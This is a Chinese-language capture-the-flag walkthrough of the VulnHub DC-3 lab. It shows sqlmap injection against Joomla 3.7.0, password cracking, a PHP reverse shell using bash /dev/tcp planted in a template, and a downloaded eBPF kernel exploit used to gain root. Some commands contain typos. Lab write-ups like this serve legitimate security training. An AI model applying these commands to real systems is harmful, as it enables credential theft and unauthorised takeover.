[大数据]DC-3靶机的渗透学习

11?

一、靶机的环境搭配

攻击机(KALI)：192.168.226.128

靶机(DC-1):? 192.168.226.129(未知)

靶机地址：DC: 3.2 ~ VulnHub

二、战前准备

2.1?IP地址确认

命令：arp-scan -l?扫描局域网所有设备（所有设备IP、MAC地址、制造商信息）

arp-scan命令： 是一个用来进行系统发现的ARP命令行扫描工具（可以发现本地网络中的隐藏设备）它可以构造并发送ARP请求到指定的IP地址,并且显示返回的所有响应。
arp-scan 可以显示本地网络中的所有连接设备，即使这些设备有防火墙。防火墙设备可以屏蔽ping，但是并不能屏蔽ARP数据包。

2.2 端口扫描

nmap -T4 -sV -O -A -p- 192.168.226.129
-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-（全部端口）

2.3 网站扫描

使用?dirb http://192.168.226.129寻找管理员登录界面

2.4?访问网页获取信息?

没有ssh服务，但是我们找到了后台登录界面，只能一步步提权

2.5 查看网站结构

?我们看到CMS是joomla，joomla是一种使用PHP语言和MySQL数据库开发的软件系统

三大PHP CMS网站：Drupal、 Wordpress、Joomla

三、渗透开始

一、flag1

1.1、joomla专业工具获取版本

joomscan --url http://192.168.226.129

通过Wappalyzer火狐插件发现了目标网页CMS为?Joomla，使用专门扫它的工具joomscan?来扫描joomla
kali里面安装joomscan工具的命令是sudo apt-get install joomscan

?扫描到目标网页?joomla版本为 3.7.0

1.2、漏洞利用

使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

searchsploit Joomla 3.7.0

?

确认版本为sql注入漏洞

1.3、漏洞查询

cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 查看漏洞文件

?1.4、sql爆破

sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

?--dbs 爆破所以数据库? ? 猜测用户数据在joomlab中

sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" --tables 指定数据库joomladb爆破所有表? ?我们找到了用户表

sqlmap -u "http://192.168.226.1239/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

-D "joomladb" -T "#__users" --columns 指定joomladb数据库中user表爆破字段

sqlmap -u "http://192.168.226.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]

sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]

?-D "joomladb" -T "#__users" -C id,nmae,password,username? ?爆取指定的字段

我们找到了用户名和密码，但是密码加密了

1.5破解密码

新建一个文件，将密码写入进去，用john破解密码

?

?找到密码 snoopy

登录后台http://192.168.226.129/administrator

?在index.php里上传一句话脚本、kali开启监听、再次访问index网页执行脚本

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.226，128/1212 0>&1' ");
?> 
http://192.168.226.129/templates/beez3/index.php   index及上传的脚本都在beez3目录下

?

查看版本信息、查找漏洞库

whoami
lsb_release -a
cat /etc/issue

?复制漏洞信息到本地

searchsploit ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/
cat 39772.txt

?

3、渗透提权

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit

?

ls
./compile.sh #执行脚本，编译文件
ls
./doubleput  #执行提权文件

whoami
cd /root
ls
cat the-flag.txt

?

?